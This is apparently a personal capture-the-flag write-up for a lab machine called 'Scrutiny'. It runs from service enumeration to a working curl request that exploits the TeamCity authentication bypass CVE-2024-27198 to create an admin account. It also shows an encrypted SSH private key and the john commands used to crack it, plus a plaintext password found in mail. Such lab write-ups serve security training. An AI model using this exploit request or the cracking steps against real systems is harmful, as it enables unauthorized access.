Scrutiny - Writeup - Konstantinovitz

## Enumeration ### SMTP - 25 TCP ``` 25/tcp open smtp Postfix smtpd | ssl-cert: Subject: commonName=onlyrands.com | Subject Alternative Name: DNS:onlyrands.com | Issuer: commonName=onlyrands.com | Public Key type: rsa | Public Key bits: 2048 |_smtp-commands: onlyrands.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING |_ssl-date: TLS randomness does not represent time ``` Banner grabbing: ``` ╭─[λ]-[/targets/scrutiny]-[192.168.226.91] ╰─> nc -vn $RHOST 25 (UNKNOWN) [192.168.226.91] 25 (smtp) open 220 onlyrands.com ESMTP Postfix (Ubuntu) EHLO all\ 250-onlyrands.com 250-PIPELINING 250-SIZE 10240000 250-VRFY 250-ETRN 250-STARTTLS 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250-SMTPUTF8 250 CHUNKING ``` NMAP SMTP enumeration: ``` ╭─[λ]-[/targets/scrutiny]-[192.168.226.91] ╰─> nmap -p 25 --script="smtp*" $RHOST PORT STATE SERVICE 25/tcp open smtp | smtp-enum-users: |_ root | smtp-vuln-cve2010-4344: |_ The SMTP server is not Exim: NOT VULNERABLE |_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed |_smtp-commands: onlyrands.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING ``` ### WAPP - 80 HTTP ``` 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: OnlyRands |_http-server-header: nginx/1.18.0 (Ubuntu) | http-methods: |_ Supported Methods: GET HEAD 443/tcp closed https Service Info: Host: onlyrands.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ![[Pasted image 20250324185547.png]] Site seems to be just a single static page? ```sh ╭─[λ]-[/targets/scrutiny]-[192.168.226.91] ╰─> ffuf -u http://$RHOST/FUZZ -c -w /arsenal/resources/raft-medium-words-lowercase.txt -mc 200,301,302 ... images [Status: 301, Size: 178, Words: 6, Lines: 8] js [Status: 301, Size: 178, Words: 6, Lines: 8] css [Status: 301, Size: 178, Words: 6, Lines: 8] ``` Seems to be a rather dead end... Nginx version does not seem to be vulnerable either... ![[Pasted image 20250324191133.png]] Redirects to: http://teams.onlyrands.com/ Better go append that to `/etc/hosts` ### teams.onlyrands.com - Teamcity **Version:** `2023.05.4` ![[Pasted image 20250324191402.png]] ![[Pasted image 20250324191504.png]] Albeit the RCE is for version `2023.05.3` it's certainly worth trying anyway. ``` ╭─[λ]-[/targets/scrutiny]-[192.168.226.91] ╰─> searchsploit -m 51884.py Exploit: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE) URL: https://www.exploit-db.com/exploits/51884 Path: /opt/exploitdb/exploits/java/remote/51884.py Codes: CVE-2023-42793 Verified: False File Type: ASCII text, with very long lines (312) Copied to: /targets/scrutiny/51884.py ``` >In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible ```python data = { "username": username, "password": "Main_password!!**", "email": "[email protected]", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]} } ``` Exploit doesn't work out...?? Default credentials? ![[Pasted image 20250324192641.png]] This [cve-2024-27198 work](https://nvd.nist.gov/vuln/detail/cve-2024-27198). - [PoC from hackthebox](https://www.hackthebox.com/blog/cve-2024-27198-explained) This request gets us in: ```sh curl -s \ -X POST 'http://teams.onlyrands.com/idontexist?jsp=/app/rest/users;.jsp' \ -H "Content-Type: application/json" \ --data '{"username": "g4rg4m3l", "password": "g4rg4m3l", "email": "g4rg4m3l", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}' ``` We can now authenticate using: `g4rg4m3l:g4rg4m3l`. ### Initial Access We can now upload plugins (RCE?). ![[Pasted image 20250330204607.png]] Some additional browsing around reveals that a user `marcot` pushed his ssh private key: http://teams.onlyrands.com/change/2?personal=false&tab=files ![[Pasted image 20250330205300.png]] ``` ``` ``` -----BEGIN OPENSSH PRIVATE KEY----- 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 9EHV94yVIeYQzmagUFXqPqFVMSM= -----END OPENSSH PRIVATE KEY----- ``` `id_rsa` file is encrypted, we go about cracking it with john: ```sh ╭─[λ]-[/targets/scrutiny]-[192.168.191.91] ╰─> ssh2john.py id_rsa > id_rsa.hash ╭─[λ]-[/targets/scrutiny]-[192.168.191.91] ╰─> john ./id_rsa.hash --wordlist=/arsenal/wordlists/rockyou.txt ``` And we get `cheer`. Let's change the passphrase to nothing: ``` ╭─[λ]-[/targets/scrutiny]-[192.168.191.91] ╰─> ssh-keygen -p -f ./id_rsa -P cheer -N "" ``` ``` ╭─[λ]-[/targets/scrutiny]-[192.168.191.91] ╰─> ssh -i ./id_rsa [email protected] ``` ## Privesc Group and user enum: ``` marcot@onlyrands:~$ id uid=1012(marcot) gid=1004(freelancers) groups=1004(freelancers) ``` `etc/passwd` contains a TON of users.... ``` marcot@onlyrands:~$ ls /home administration finance freelancers operations ``` Let's go check `mail`, we find a mail containing the following message: ``` marcot@onlyrands:/etc$ mail Mail version 8.1.2 01/15/2001. Type ? for help. "/var/mail/marcot": 5 messages 5 new >N 1 matthewa@onlyrand Fri Jun 7 09:33 25/829 Goodbye, best friend N 2 matthewa@onlyrand Fri Jun 7 09:33 30/1146 Goodbye! N 3 marcot@onlyrands. Fri Jun 7 09:33 23/825 Welcome, new freelancer! N 4 edgarm@onlyrands. Fri Jun 7 09:33 22/714 Congratulations N 5 sonjas@onlyrands. Fri Jun 7 09:33 22/682 FIX YOUR NUMBERS & Message 1: From [email protected] Fri Jun 7 09:33:48 2024 X-Original-To: [email protected] From: [email protected] To: [email protected] Subject: Goodbye, best friend Date: Fri, 18 Feb 2022 08:43:11 (UTC) MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit Marco, Dach, the imbecile, forgot to disable my access, so you can login using my account. The password is "IdealismEngineAshen476" (without the quotation marcot). I've left you a parting gift--your eyes only. I'm gonna miss you, pal. Catch you on the flip side. Sincerely, Matthew A. & ``` ## Lessons Learned - Got stuck looking for the right CVE, took a hint, should have been more preseverant in my enumeration.